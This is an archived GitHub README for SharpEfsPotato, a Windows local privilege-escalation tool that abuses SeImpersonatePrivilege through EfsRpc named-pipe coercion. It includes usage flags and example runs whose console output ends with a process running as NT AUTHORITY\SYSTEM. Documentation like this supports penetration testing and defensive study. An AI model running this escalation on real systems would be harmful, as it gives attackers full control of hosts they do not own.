GitHub - bugch3ck/SharpEfsPotato: Local privilege escalation
from SeImpersonatePrivilege using EfsRpc.
By bugch3ck
Archived: 2026-04-05 23:19:59 UTC
Folders and files
Name Name Last commit message Last commit date
Latest commit
Update README.md
Oct 17, 2022
23c9079 · Oct 17, 2022
History
2 Commits
SharpEfsPotato SharpEfsPotato Add project files. Oct 17, 2022
.gitattributes .gitattributes Add project files. Oct 17, 2022
.gitignore .gitignore Add project files. Oct 17, 2022
README.md README.md Update README.md Oct 17, 2022
SharpEfsPotato.sln SharpEfsPotato.sln Add project files. Oct 17, 2022
README
https://github.com/bugch3ck/SharpEfsPotato
Page 1 of 3

Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @EthicalChaos and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
Usage
C:\temp>SharpEfsPotato.exe -h
SharpEfsPotato by @bugch3ck
 Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
 Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
 -p, --prog=VALUE Program to launch (default cmd.exe)
 -a, --args=VALUE Arguments for program (default null)
 -h, --help Display this help
Examples
Default behavior: Start cmd.exe as system in a separate process (in separate console)
C:\temp>SharpEfsPotato.exe
SharpEfsPotato by @bugch3ck
 Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
 Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f/\44259a4a-cbe
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
Specify PowerShell binary and arguments
C:\temp>SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Conten
SharpEfsPotato by @bugch3ck
 Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
 Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
https://github.com/bugch3ck/SharpEfsPotato
Page 2 of 3

[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\temp>type C:\temp\w.log
nt authority\system
Source: https://github.com/bugch3ck/SharpEfsPotato
https://github.com/bugch3ck/SharpEfsPotato
Page 3 of 3